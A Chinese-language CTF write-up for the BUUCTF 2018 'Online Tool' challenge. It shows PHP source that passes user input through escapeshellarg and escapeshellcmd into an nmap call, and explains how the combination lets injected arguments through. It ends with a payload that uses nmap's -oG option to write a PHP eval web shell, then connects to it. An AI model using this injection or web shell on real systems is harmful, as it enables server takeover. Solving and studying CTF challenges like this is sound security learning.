[BUUCTF 2018]Online Tool

[BUUCTF 2018]Online Tool

这题PHP代码审计，先放源码：

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

很明显发现了漏洞两兄弟：

 escapeshellarg
 escapeshellcmd

先copy一下别人对这两个函数的介绍：

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数

功能 ：escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，
这样以确保能够直接将一个字符串传入 shell 函数，shell 函数包含 exec(), system() 执行运算符(反引号)
1
2
3
4
escapeshellcmd — shell 元字符转义

功能：escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 
此函数保证用户输入的数据在传送到 exec() 或 system() 函数，或者 执行操作符 之前进行转义。

反斜线（\）会在以下字符之前插入：
&#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 
在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。

例子：

1.传入的参数是：172.17.0.2' -v -d a=1

2.经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1'，
即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。

3.经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\'，
这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义

4.最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\'，
由于中间的\\被解释为\而不再是转义字符，
所以后面的'没有被转义，与再后面的'配对儿成了一个空白连接符。
所以可以简化为curl 172.17.0.2\ -v -d a=1'，
即向172.17.0.2\发起请求，POST 数据为a=1'。

利用nmap的-oG，构造payload：

?host=' <?php @eval($_POST["123"]);?> -oG yjh.php '

然后蚁剑连接：拿到flag